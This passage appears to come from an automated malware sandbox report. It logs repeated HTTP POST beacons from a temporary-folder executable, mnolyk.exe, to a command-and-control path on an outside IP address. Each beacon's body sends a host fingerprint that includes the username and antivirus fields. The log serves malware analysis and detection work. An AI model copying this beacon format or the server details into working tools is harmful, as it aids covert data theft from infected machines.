                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      702192.168.2.75039762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:08.575838089 CET817OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.639832973 CET817INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      703192.168.2.75039862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:08.813550949 CET818OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:08.877121925 CET818INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      704192.168.2.75039962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:09.045856953 CET819OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.110275984 CET819INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      705192.168.2.75040062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:09.283190966 CET820OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.347635984 CET820INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      706192.168.2.75040162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:09.526189089 CET821OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.590598106 CET821INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      707192.168.2.75040262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:09.761332035 CET822OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:09.824311018 CET822INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      708192.168.2.75040362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:09.998023987 CET823OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.062766075 CET823INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      709192.168.2.75040462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:10.231347084 CET824OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.293638945 CET824INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      71192.168.2.74976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:19.651200056 CET186OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:19.715879917 CET186INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      710192.168.2.75040562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:10.475955963 CET825OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.544022083 CET825INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      711192.168.2.75040662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:10.747493029 CET826OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:10.812560081 CET826INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      712192.168.2.75040762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:11.016581059 CET827OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.081345081 CET827INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      713192.168.2.75040862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:11.262816906 CET828OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.327658892 CET828INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      714192.168.2.75040962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:11.502083063 CET829OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.566924095 CET829INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      715192.168.2.75041062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:11.734232903 CET830OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:11.797760963 CET830INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      716192.168.2.75041162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:11.977608919 CET831OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.044487953 CET831INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      717192.168.2.75041262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:12.220069885 CET832OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.284826994 CET832INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      718192.168.2.75041362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:12.452914953 CET833OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.518393040 CET833INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      719192.168.2.75041462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:10:12.687094927 CET834OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:12.749799967 CET834INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      72192.168.2.74976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:19.936779976 CET187OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
